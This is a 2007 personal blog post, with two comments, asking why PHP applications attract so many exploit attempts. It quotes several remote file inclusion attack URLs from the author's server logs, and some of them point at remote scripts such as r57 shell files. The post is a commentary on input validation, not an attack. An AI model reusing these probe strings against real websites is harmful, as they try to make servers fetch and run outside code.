MainDoctor WhoMusicSoftware
Main Page

Alden Bates' Weblog

Feigning normality since 1973

PHP and Security Holes

Filed in: Website Management.

Watch out - I'm about to make myself sound like a snob. :)

What is it about PHP that spawns applications with security holes? My site gets hit a lot by people/bots probing for security holes, and said hack attempts exclusively include "php" somewhere in the URL. Witness a smattering of hack attempts that have occurred recently:

  • /index.php?plugin=http://perdu.ch/cgi-bin/echo?
  • ///plugin/HP_DEV/cms2.php?s_dir=http://secretagent.by.ru/r57.php??
  • /plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://www.kebcomputer.com/cache/tests.txt??
  • /get_session_vars.php?path_to_smf=http://www.eclypse.info/oche?
  • /archives/2005/bridges/SMF/logout.php?path_to_smf=http://utenti.lycos.it/r57/stringa.txt?
  • /index.php3?p=http://www.freewebs.com/enemyownz/id.txt?
  • /index.php3?i=http://80.201.236.78/~pat/evilx?
  • /plugins/%3Cwbr%20/%3Epagedarchives.html/index.php?page=http://www.techgoiania.com.br/components/com_juice/canboy1?

As an aside, even an idiot could see that last URL wouldn't work. Evidently the tool used to probe it was written by a chimp. But I digress.

What's with all the security holes in PHP apps? Is it just that PHP is so popular for web development that it has the same problem as Windows (the majority use it, so hacks are more common)? Of course, all of the URLs there have something in common - they obviously count on the application in question using input from the end user without validating it first. Is there something in PHP which tends to encourage this sort of thing, or just that it's so widely used that it attracts more lazy programming?

Of course, both Wordpress and Movable Type (both applications which I use on this site) have had security holes - one uses PHP, the other uses Perl, and both are written to a very high standard. Both are also widely used, which suggests to me that PHP is a victim of its own success. Like Windows, they're so common that any security holes are highly sought after by hackers.

That said, I'd be extremely hesitant about installing any other PHP applications here...

Posted June 25, 2007 8:34 PM

Comments

Just laziness I think. Well, that and the fact that PHP lends itself so well to dabbling, so a lot of PHP amateurs have never heard of input filtering.

I remember that as little as a year or so ago, I did zero filtering on SQL input. I just didn't realize the importance back then.

--
Aran

Posted by: Arancaytar | June 26, 2007 3:08 AM

Yeah, some of the early Perl I wrote is shocking. I've rewritten quite a lot of it, of course. :)

Posted by: Alden Bates | June 26, 2007 9:43 AM

Tetrap.com Site Map